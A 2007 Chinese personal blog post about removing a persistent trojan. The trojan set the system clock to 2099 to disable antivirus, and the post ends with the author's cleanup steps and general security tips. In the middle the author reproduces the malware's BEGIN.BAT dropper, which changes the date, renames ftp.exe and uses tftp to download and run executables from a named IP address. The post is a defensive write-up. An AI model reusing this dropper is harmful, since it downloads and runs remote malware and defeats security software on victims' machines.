作者:ange 来源:本站原创 日期:2007年10月16日
一直是听别人在说木马病毒是怎么的厉害,我却一直难得深有体会,一般来说,不管多厉害的病毒,只要删除了相应的文件,都是可以清除的,然后在安全模式下查杀一下,再把注册表里的相关项删除,大都不会有多大问题的了。不过最近遇到的BEGIN.BAT木马却是让我大伤了一回脑筋。
我电脑配置不怎么好,为了使用流畅,我上网大都是不用杀毒软件的,用时髦的话说,叫“裸奔”,不过因为电脑体质不好,裸虽裸了,奔却是奔不起来,小跑就是很不错的了。言归正传,某年某月某日下午,小跑正欢,却慢慢的感觉越来越力不从心了,开始以为是宽带网速的问题,没有理会,不过却是越来越慢,而且很明确的感觉电脑有异常(说不出是什么异常,一种直觉吧)。于是我马上打开卡巴查毒,一打开,卡巴却提示,“您的授权期限已过期”,再马上看系统时间,2099年10月9日。难怪卡巴说过期了!
改回时间,重启卡巴,一连串的杀猪声就开始此起彼伏的了。单是C盘扫下来就是一百多个木马,杀完毒后,没去理会别的,继续上网!一会儿,卡巴又提示“您的授权期限已过期”,再看时间,又到了2099年,卡巴再次被挂。看来问题有点严重的了,我于是改回时间,全盘扫描,然后重启到安全模式,用卡巴和360再次全盘查杀。然后在显示所有文件的情况下,删除非系统盘里的所有非文档类文件(我的电脑只有C盘有装程序文件)。然后开机,心想,这下该天下太平了。
开机,上网不到十分钟,卡巴报发现 tfp.exe 病毒,接着卡巴又警示“您的授权期限已过期”,再次光荣殉职。接下来,我除了用卡巴,360外,又分别使用 流氓软件清理,恶意软件清理助手,反复查杀,还是一切依旧。
不得已,重装系统,开机,依然过不到半小时卡巴就报毒,殉职....
这的确是一个难緾的木马,在现有软件都查不出的情况下,我又下载了号称100%查杀木马的白猫系统王,有全球最强木马杀手之称的“ewido”。它们来了之后都不负众望,一个找到一个微软后门程序(名字忘了,N年前就听说了,一个商业用途的后门),一个找到了“千千静听”(不敢说千千静听坏话,应该多是外来的和尚不会念经所致)。我报着宁可错杀一千,绝不放过一个决心,一一删除,重启之后,一切依旧。
经过了多次反复中招,我总结出这个木马的特点:
1.当前几乎所有的安全类软件都无法查出其真身。
2.此木马本身并无恶意程序,也不具有破坏能力。
3.它会在 windos 文件夹内生成BEGIN.BAT文件和help.dll文件,然后利用它们下载或生成tfp.exe执行文件。ftp.exe 会修改系统时间,致使运行的安全软件失效。这时它们就会疯狂的下载木马病毒到电脑上。
4.其生成和下载的木马的主要行为包括:修改系统时间挂掉杀毒软件,禁止显示系统文件和隐藏文件,疯狂下载盗号木马。我估计,如果用户不采取任何措施,一个小时后,用户可能对电脑的权力只有一个----关机!
5.根据网上反应出来的情况,目前没有难彻底解决的方法。
下面说说我的解决思路和方法,因为该木马最先生成的可能是 BEGIN.BAT 文件,我用记事本打开,查看其内容为:
set a=2007-10-* 星期*
date=2099-01-01
ftp.exe -s:C:\WINDOWS\help.dll
if exist C:\WINDOWS\system32\ftp.exe ren C:\WINDOWS\system32\ftp.exe sfd.exe
if not exist tfp.exe sfd -s:C:\WINDOWS\help.dll
if not exist tfp.exe sft -s:C:\WINDOWS\help.dll
if not exist tfp.exe tftp -i 59.39.59.102 get tfp.exe
if not exist good.exe tftp -i 59.39.59.102 get good.exe
tfp.exe
tfp.exe
good.exe
good.exe
date=%a%
:end
del C:\WINDOWS\help.dll
del C:\WINDOWS\BEGIN.BAT
exit
可见它要生成的文件有 help.dll, tfp.exe, good.exe, 还会连接到IP59.39.59.102下载木马,于是我就先断其后路:
一,禁止连接到IP59.39.59.102 。
二,在相关文件夹里,预先建立 help.dll, tfp.exe, good.exe文件(空文件,无内容的)并且将属性设为“只读”。
三,在组策略里删除有修改时间权限的所有用户。
四,清除系统盘外的所有非文档类文件,清除注册表里的可疑项。
五,在安全模式下用多个安全软件全盘查毒。
六,删除 BEGIN.BAT ,同样建一个只读权限的 BEGIN.BAT空文件替代它。
经过这样处理后,这个木马再也没有出现过,世界终于清静了,现在又开始“裸奔’了,呵呵。
说点题外话,虽然木马没有再现身,不过一直没有找到其真身彻底删除,所以还是不能轻松大意。我个人觉得,这个木马可能是利用IE或QQ的后门来下载木马。为安全起见:
有条件的朋友可以把QQ,MSN等放到“保险箱”里,(360安全卫士,瑞星,终截者等都有这样的功能)。
最好升级到IE7或是使用火狐2.0浏览网页,用IE6时一定要及时更新安全补丁。
火狐2.0下载地址:
IE7.0中文版下载:IE7.0简体版太平洋电脑网下载(需正版验证)
360安全卫士下载:360定制版(会显示本站最新文章,不喜欢的朋友请下载自由版的)
360保险箱下载:公测版360保险箱下载
你可以使用这个链接引用该篇文章 http://publishblog.blogchina.com/blog/tb.b?diaryID=6497523